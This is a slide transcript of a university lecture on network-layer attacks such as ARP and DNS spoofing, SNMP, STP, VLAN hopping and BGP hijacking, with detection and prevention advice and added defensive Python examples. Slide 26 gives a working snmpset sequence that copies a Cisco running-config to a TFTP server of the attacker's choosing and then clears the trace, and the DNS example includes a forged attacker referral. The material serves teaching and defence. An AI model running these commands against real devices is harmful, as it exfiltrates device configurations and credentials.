Jeroen van Beek - OS3 · 2018-04-12 (slide transcript)
Slide 1

Jeroen van Beek
Slide 2

- Why bother?
- Popular / interesting attacks
- Now what?
- Questions?
Slide 3

- Low-level attacks can be very dangerous
  - In many cases difficult to detect / prevent at higher OSI levels
Slide 5

- Passive attack
- Works on non-switched networks
  - Including WLAN
- Find interesting information
  - Plain text services
  - HTTP logins (see lab assignment)
  - SNMP
  - Telnet (still used in some environments!)
  - Password hashes ('pass the hash')
- Detection and prevention
  - Use switched networks
Slide 6

- Active attack
- Switched environments only show broadcast / multicast traffic
- Overflow CAM tables
  - Switch will forward traffic to all ports
  - See dsniff's macof: https://www.monkey.org/~dugsong/dsniff/
- Detection and prevention
  - Limit the number of MACs per switch port
    - Monitor or auto shutdown
Slide 7

- Using a forged source IP address to impersonate other systems
- Targets
  - UDP services
  - TCP services with predictable characteristics
  - DoS
Slide 8

- Oldskewl problem
- Weak authentication mechanisms using UDP
  - Add your system to the list of trusted systems using a spoofed packet
- More difficult to exploit for TCP services
  - Because of handshaking
  - However not impossible with TCP sequence prediction
- However, old mistakes are made again
  - Everything over IP
  - Burglar alarm over UDP
    - Including status messages and switching the system off
Slide 9

- Kaminsky DNS Spoofing
  - Attacker's website contains a link to x.domain.com
    - E.g. an image
  - Target's DNS server resolves x.domain.com
  - The attacker knows this and sends replies with fake records to the target
    - UDP, query ID (QID) identifies the reply
    - QID is a 16-bit value (65,536 possibilities): send all
    - Include a forged referral for domain.com to poison the cache
  - domain.com points to an IP of the attacker's choice
  - http://www.blackhat.com/presentations/bh-jp-08/bh-jp-08-Kaminsky/BlackHat-Japan-08-Kaminsky-DNS08-BlackOps.pdf
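The resolver-side checks that decide whether a reply such as the one on this slide may enter the cache, as an added example (not code from the slides): it matches QID, source port and question, rejects out-of-bailiwick glue, and works out how many queries an attacker needs against 16 bits of QID versus QID plus a random source port. The dict layout of `QUERY`, `GOOD` and `FORGED` is an assumption for illustration; a real resolver parses DNS wire format first.

```python
"""Resolver-side checks against Kaminsky-style poisoning (added example,
not from the slides). Assumption: replies are already parsed into the
small dict form below; a real resolver parses DNS wire format first."""
from __future__ import annotations


def normalize(name: str) -> str:
    return name.rstrip(".").lower()


def in_bailiwick(owner: str, zone: str) -> bool:
    """True if `owner` equals `zone` or lies below it."""
    owner, zone = normalize(owner), normalize(zone)
    return owner == zone or owner.endswith("." + zone)


def validate_response(query: dict, response: dict) -> list[str]:
    """Reasons to discard `response`; an empty list means it may be cached.

    query:    {"qid", "sport", "qname", "zone"}; zone is the zone the queried
              authoritative server is delegated for (e.g. "domain.com").
    response: {"qid", "dport", "qname", "records"}; records are
              (section, owner, rtype, rdata) tuples.
    """
    problems = []
    if response["qid"] != query["qid"]:
        problems.append("qid mismatch")
    if response["dport"] != query["sport"]:
        problems.append("source port mismatch")
    if normalize(response["qname"]) != normalize(query["qname"]):
        problems.append("question mismatch")
    # Out-of-bailiwick glue (the older poisoning trick) is rejected outright.
    # The Kaminsky referral for domain.com *is* in bailiwick, so for that case
    # only the QID and source-port entropy checked above protects the cache.
    for section, owner, _rtype, _rdata in response["records"]:
        if section in ("authority", "additional") and not in_bailiwick(owner, query["zone"]):
            problems.append(f"out-of-bailiwick {section} record for {owner}")
    return problems


def expected_queries_to_win(entropy_bits: int, replies_per_query: int) -> float:
    """Expected number of queries the attacker must trigger before one forged
    reply matches, if `replies_per_query` guesses arrive before the real answer.
    16-bit QID and 65 536 guesses per query: 1 (the slide's "send all").
    Adding a random 16-bit source port: about 65 536 queries."""
    p_win = min(1.0, replies_per_query / 2 ** entropy_bits)
    return 1.0 / p_win


# Constructed sample: the resolver asked ns.domain.com for x.domain.com.
QUERY = {"qid": 0x1234, "sport": 40321, "qname": "x.domain.com", "zone": "domain.com"}
GOOD = {"qid": 0x1234, "dport": 40321, "qname": "x.domain.com",
        "records": [("answer", "x.domain.com", "A", "192.0.2.10"),
                    ("authority", "domain.com", "NS", "ns.domain.com"),
                    ("additional", "ns.domain.com", "A", "192.0.2.53")]}
# Forged reply: the guessed QID is right, the port is wrong, and the glue
# points outside the zone the queried server is responsible for.
FORGED = {"qid": 0x1234, "dport": 53, "qname": "x.domain.com",
          "records": [("authority", "domain.com", "NS", "ns.attacker.example"),
                      ("additional", "ns.attacker.example", "A", "203.0.113.9")]}
```

`validate_response(QUERY, FORGED)` lists both the port mismatch and the out-of-bailiwick glue; with the port guessed right as well, only the entropy figures from `expected_queries_to_win` stand between the forged referral and the cache.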
Slide 10

- Mainly used for DoS attacks
- Increasing efficiency
  - NTP monlist
  - SNMP
  - DNS: ANY query, DNSSEC
- Send one spoofed packet to the broadcast address
  - Many hosts / services reply to the spoofed address
  - So called 'smurf attack'
Slide 12

- Detection
  - Check source IPs
    - IDS
- Prevention
  - Do not use source IPs for authentication purposes
  - Do not use UDP for (indirect) authentication purposes
  - Ingress / egress filtering
    - Drop spoofed packets
    - RFC 2827
Slide 13

- Used to become a man in the middle
- Attacker answers clients before the real server does
  - Provide the client with fake DNS servers / gateway / ...
- Monitor / modify traffic
- Detection and prevention
  - Several tools out there for detection
    - Network devices: DHCP snooping, UNIX: dhcp_probe, Windows: dhcploc
  - Shutdown unused network ports
  - Lockdown client PCs
Slide 14

- Ethernet attack, both for wired and wireless
- Fake an ARP address to become a man in the middle
Slide 15

- Find interesting information
  - Plain text services
  - Password hashes
- Use MITM exploits for specific services
  - E.g. SSHv1, HTTPS, POPS, IMAPS, SIPS, RDP
- Sophisticated tools are available, automating MITM, sniffing and cracking
  - Ettercap https://github.com/Ettercap/ettercap
    - Sed for network traffic
  - Cain & Abel http://www.oxid.it/cain.html
    - http://www.youtube.com/watch?v=BXPqq_XQZu8
Slide 17

- Detection and prevention
  - Network devices: ARP inspection
  - Limit the number of MACs per switch port
    - Monitor or auto shutdown
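What "ARP inspection" amounts to when done in software, as an added example (not a tool from the slides): an arpwatch-style monitor that flags an IP whose MAC changes, with the gateway treated as critical, and a single MAC that starts answering for more addresses than a host should. The `(timestamp, ip, mac)` event form and the thresholds are assumptions for illustration; a deployment would feed it from a packet capture or the switch's logs.

```python
"""ARP-cache anomaly detector in the spirit of arpwatch (added example, not a
tool from the slides). Assumption: ARP replies arrive as
(timestamp, sender_ip, sender_mac) tuples; a deployment would capture them
with a pcap library or from the switch's ARP inspection logs."""
from __future__ import annotations

from collections import defaultdict


class ArpMonitor:
    def __init__(self, gateways: set[str], max_ips_per_mac: int = 3):
        self.table: dict[str, str] = {}                      # ip -> last MAC seen
        self.claims: dict[str, set[str]] = defaultdict(set)  # mac -> IPs it answered for
        self.gateways = gateways
        self.max_ips_per_mac = max_ips_per_mac

    def observe(self, ts: float, ip: str, mac: str) -> list[str]:
        """Process one ARP reply and return the alerts it raises (usually none)."""
        mac = mac.lower()
        alerts = []
        old = self.table.get(ip)
        if old is not None and old != mac:
            # An IP changing MAC is how a spoofer redirects traffic; a gateway
            # flip is the classic MITM setup and gets the highest severity.
            severity = "CRITICAL" if ip in self.gateways else "WARNING"
            alerts.append(f"{severity} {ts}: {ip} moved {old} -> {mac}")
        self.table[ip] = mac
        self.claims[mac].add(ip)
        if len(self.claims[mac]) > self.max_ips_per_mac:
            # One MAC answering for many IPs: either a router or a host
            # impersonating the whole segment.
            alerts.append(f"WARNING {ts}: {mac} now answers for {len(self.claims[mac])} IPs")
        return alerts


def analyze(events, gateways: set[str]) -> list[str]:
    """Run a fresh monitor over a sequence of events and collect all alerts."""
    mon = ArpMonitor(gateways)
    alerts = []
    for ts, ip, mac in events:
        alerts.extend(mon.observe(ts, ip, mac))
    return alerts


# Constructed sample: normal replies, then one MAC takes over the gateway and hosts.
EVENTS = [
    (1.0, "10.0.0.1", "aa:aa:aa:aa:aa:01"),
    (1.1, "10.0.0.5", "aa:aa:aa:aa:aa:05"),
    (2.0, "10.0.0.1", "bb:bb:bb:bb:bb:bb"),
    (2.1, "10.0.0.5", "bb:bb:bb:bb:bb:bb"),
    (2.2, "10.0.0.6", "bb:bb:bb:bb:bb:bb"),
    (2.3, "10.0.0.7", "bb:bb:bb:bb:bb:bb"),
]
GATEWAYS = {"10.0.0.1"}

if __name__ == "__main__":
    for line in analyze(EVENTS, GATEWAYS):
        print(line)
```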
Slide 18

- In most cases no device authentication
- In many cases shared secrets
  - WEP (still used for e.g. legacy industrial applications)
  - WPA PSK ('pre shared keys')
  - One key to own them all!
- Flaws in crypto
  - WEP
  - WPA TKIP
  - WPS
Slide 19

- Attacking isolated wireless networks
  - High power adapters
  - High gain antennas
- Attacking crypto
  - Weaknesses allow an attacker to retrieve the secret key
  - Aircrack-ng http://www.aircrack-ng.org/
  - After retrieving the key it's a virtual plain network cable
- Attacking passwords
  - Defaults
  - Easy-to-guess / crack
  - MAC derived: https://www.usenix.org/system/files/conference/woot15/woot15-paper-lorente.pdf
  - Jam the signal first to trigger association messages
Slide 22

- Attacking OS functionality
  - Popular OSs store WLAN settings
  - Device tries to find the SSIDs automatically
  - Set up your own access point
    - Forward traffic to the real access point
  - MITM
- Detection and prevention
  - Detection of rogue APs
  - Prevent problems by hardening wireless equipment and by using proven technologies
    - IEEE 802.1X
    - AES encryption
Slide 23

- Many protocols are used for network management
  - Simple Network Management Protocol (SNMP)
  - Spanning Tree Protocol (STP)
  - Cisco Discovery Protocol (CDP)
  - Hot Standby Router Protocol (HSRP)
  - …
- Most are OSI layer 2 based
- Most are designed with availability in mind
  - Weak / no security features
- Many are enabled by default
Slide 24

- Example: SNMP
  - Uses 'community strings'
    - Some kind of secret password
    - Read-only and read-write
    - Defaults: 'public' and 'private'
  - Attacks
    - Guess / brute force community string
    - Most OSs: information leakage (accounts, routing)
    - Cisco: dump config
Slide 26

```shell
# The ConfigCopyProtocol is set to TFTP
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.2.111 i 1
# Set the SourceFileType to running-config
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.3.111 i 4
# Set the DestinationFileType to networkfile
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.4.111 i 1
# Sets the ServerAddress to the IP address of the TFTP server
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.5.111 a <TFTP IP>
# Sets the CopyFilename to your desired file name.
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.6.111 s <Filename>
# Sets the CopyStatus to active which starts the copy process.
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 1
# Sets the CopyStatus to delete which cleans all saved information out of the MIB
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 6
```
Slide 27

- Example: Spanning Tree Protocol
  - Used for redundancy
  - Takes care of topology changes
    - Broken network links
    - Network loops
    - Malfunctioning network devices
  - One device is the 'root'
    - The root can trigger a reconfiguration
  - During reconfiguration all devices act like a hub
    - Sniffing
  - No security features in the protocol
    - Become the root and reconfigure the network in such a way that all traffic passes through your system
Slide 29

- Detection
  - Monitor topology changes
    - In practice: ?
- Prevention
  - IP based: ACLs
  - Use security features of network equipment
  - Never use network management protocols on access ports of end-users
  - Disable all unneeded management protocols
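One answer to "monitor topology changes, in practice: ?" for the STP case from slide 27, as an added example (not from the slides): a watcher that applies the two checks switches call BPDU guard and root guard, raising an alert for any BPDU arriving on an end-user port and for any BPDU announcing a better root than the one already known. The decoded-BPDU dict layout and the port names are assumptions for illustration.

```python
"""STP watch: raise alerts on BPDUs that try to change the topology (added
example, not from the slides). Assumption: BPDUs are supplied as dicts already
decoded from the wire, and `edge_ports` are the access ports where end users
connect and where no bridge should ever speak STP."""
from __future__ import annotations


def bridge_id(priority: int, mac: str) -> tuple[int, str]:
    """STP elects the numerically lowest bridge ID as root: priority first,
    MAC address as tie-breaker. Tuples compare the same way."""
    return (priority, mac.lower())


class StpWatch:
    def __init__(self, edge_ports: set[str]):
        self.edge_ports = edge_ports
        self.root: dict[int, tuple[int, str]] = {}  # vlan -> best root id seen
        self.root_changes: dict[int, int] = {}      # vlan -> number of takeovers

    def observe(self, bpdu: dict) -> list[str]:
        port, vlan = bpdu["port"], bpdu["vlan"]
        claimed = bridge_id(bpdu["root_priority"], bpdu["root_mac"])
        alerts = []
        # BPDU guard: an end-user port must never receive a BPDU at all.
        if port in self.edge_ports:
            alerts.append(f"BPDU on edge port {port} (vlan {vlan}) from "
                          f"{bpdu['sender_mac']}: err-disable the port")
        known = self.root.get(vlan)
        if known is None:
            self.root[vlan] = claimed          # first BPDU: learn the baseline
        elif claimed < known:
            # Root guard: somebody announces a better root than the one we run.
            self.root_changes[vlan] = self.root_changes.get(vlan, 0) + 1
            alerts.append(f"root takeover vlan {vlan}: {known} -> {claimed} on {port}")
            self.root[vlan] = claimed
        return alerts


def analyze(bpdus, edge_ports: set[str]) -> list[str]:
    """Run a fresh watcher over a sequence of BPDUs and collect all alerts."""
    watch = StpWatch(edge_ports)
    alerts = []
    for b in bpdus:
        alerts.extend(watch.observe(b))
    return alerts


# Constructed sample: the legitimate root on the uplink, then a host on an
# access port announcing priority 0 to become root.
BPDUS = [
    {"port": "Gi0/24", "vlan": 10, "root_priority": 4096, "root_mac": "00:00:5e:00:53:01",
     "sender_mac": "00:00:5e:00:53:01"},
    {"port": "Gi0/24", "vlan": 10, "root_priority": 4096, "root_mac": "00:00:5e:00:53:01",
     "sender_mac": "00:00:5e:00:53:02"},
    {"port": "Gi0/5", "vlan": 10, "root_priority": 0, "root_mac": "00:00:5e:00:53:ff",
     "sender_mac": "00:00:5e:00:53:ff"},
]
EDGE_PORTS = {"Gi0/1", "Gi0/5"}

if __name__ == "__main__":
    for line in analyze(BPDUS, EDGE_PORTS):
        print(line)
```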
Slide 30

- Connect to other, less restrictive, VLANs
  - In many cases supported built-in in the driver
  - Fancy tools available to make attacks easy to perform, e.g. (ab)using misconfigured network management protocols: http://www.yersinia.net/
  - https://github.com/nccgroup/vlan-hopping---frogger
- Detection
  - Not needed, just prevent it
- Prevention
  - Disable trunk negotiation
  - Configure ports as access ports
  - Don't use VLAN 1
Slide 31

- Used for core routing on the internet
  - Autonomous Systems (AS) advertise IP ranges that are reachable using their routers
- Become an AS and start peering
- Advertise IP ranges that aren't yours
  - Traffic is routed via your systems
  - Sniffing, MITM
  - Happens accidentally and on purpose
Slide 34

- Attacks
  - http://www.blackhat.com/presentations/bh-europe-09/Rey_Mende/BlackHat-Europe-2009-Mende-Rey-All-Your-Packets-slides.pdf
  - http://www.blackhat.com/docs/us-15/materials/us-15-Gavrichenkov-Breaking-HTTPS-With-BGP-Hijacking-wp.pdf
- Detection
  - Monitoring: https://bgpmon.net/
- Prevention
  - RPKI?
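What the "RPKI?" on this slide buys a router in practice, as an added example (not from the slides): route origin validation as in RFC 6811, classifying each announcement as valid, invalid or not found against the signed ROAs and dropping the invalid ones, which is the shape a hijack of somebody else's prefix takes. The ROA tuple form and the AS numbers (documentation range) are assumptions for illustration; real routers fetch ROAs from an RPKI cache over RTR.

```python
"""RPKI route origin validation as in RFC 6811 (added example, not from the
slides). Assumption: validated ROAs are given as (prefix, max_length, asn)
tuples; in practice a router fetches them from an RPKI cache over RTR."""
from __future__ import annotations

import ipaddress


def covering_roas(prefix: str, roas):
    """ROAs whose prefix contains the announced prefix, regardless of ASN."""
    net = ipaddress.ip_network(prefix)
    found = []
    for roa_prefix, max_len, asn in roas:
        roa_net = ipaddress.ip_network(roa_prefix)
        if roa_net.version == net.version and net.subnet_of(roa_net):
            found.append((roa_net, max_len, asn))
    return found


def rov_state(prefix: str, origin_asn: int, roas) -> str:
    """Return 'valid', 'invalid' or 'not_found' for `prefix` originated by `origin_asn`."""
    net = ipaddress.ip_network(prefix)
    covering = covering_roas(prefix, roas)
    if not covering:
        return "not_found"  # nobody signed this space; policy usually accepts it
    for _roa_net, max_len, asn in covering:
        if asn == origin_asn and net.prefixlen <= max_len:
            return "valid"
    # Covered by a ROA but announced from the wrong AS or as a more specific
    # than the holder allowed: the shape of a hijack (or of a mistake).
    return "invalid"


def accepted_routes(announcements, roas, drop_invalid: bool = True):
    """Apply the usual policy: drop 'invalid', keep 'valid' and 'not_found'."""
    kept = []
    for prefix, asn in announcements:
        if drop_invalid and rov_state(prefix, asn, roas) == "invalid":
            continue
        kept.append((prefix, asn))
    return kept


# Constructed sample: AS 64496 holds 192.0.2.0/24 (no more specifics allowed)
# and 2001:db8::/32 (down to /48). AS 64511 is an unrelated network.
ROAS = [("192.0.2.0/24", 24, 64496), ("2001:db8::/32", 48, 64496)]
ANNOUNCEMENTS = [
    ("192.0.2.0/24", 64496),     # legitimate
    ("192.0.2.0/25", 64496),     # holder's own more specific beyond maxLength
    ("192.0.2.0/24", 64511),     # origin hijack
    ("198.51.100.0/24", 64511),  # unsigned space
    ("2001:db8:1::/48", 64496),  # legitimate IPv6 more specific
]

if __name__ == "__main__":
    for prefix, asn in ANNOUNCEMENTS:
        print(prefix, asn, rov_state(prefix, asn, ROAS))
```

Note that 'not_found' is the common case for unsigned space, so ROV only protects prefixes whose holders have published ROAs; that is the caveat behind the slide's question mark.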
Slide 35

- Abuse authorized protocols to open unauthorized communication channels
  - TCP over ICMP
    - Ptunnel @ http://www.cs.uit.no/~daniels/PingTunnel/
  - Tunnel IP over DNS
    - Iodine @ http://code.kryo.se/iodine/
  - Tunnel IP over …
    - Everything!
  - See https://www.os3.nl/_media/2005-2006/rp1/ms_mk_report.pdf, http://www.delaat.net/rp/2014-2015/p98/report.pdf and recent OT projects
Slide 38

- Detection
  - Lab assignment!
- Prevention
  - Lab assignment!
Slide 39

- Sensitive information might also use other networks
  - DECT, GSM, Bluetooth, …
- Those are not covered in this talk
  - However: be aware of the risks!
- More and more phones and tablets are part of the network…
  - Are they (also) well-protected against the attacks we've seen earlier today?
Slide 40

- Detection
  - Detection of well-known attacks using IDS
- Prevention
  - Don't trust the network!
  - Shutdown all unused ports
  - Enforce the use of safe protocols
    - Problems on lower OSI levels shouldn't affect the security level of applications
- There's more than (wireless) Ethernet
  - Be aware of other technologies that provide access to sensitive information
    - DECT, GSM, VoIP, …
Slide 41

J.C.vanBeek uva.nl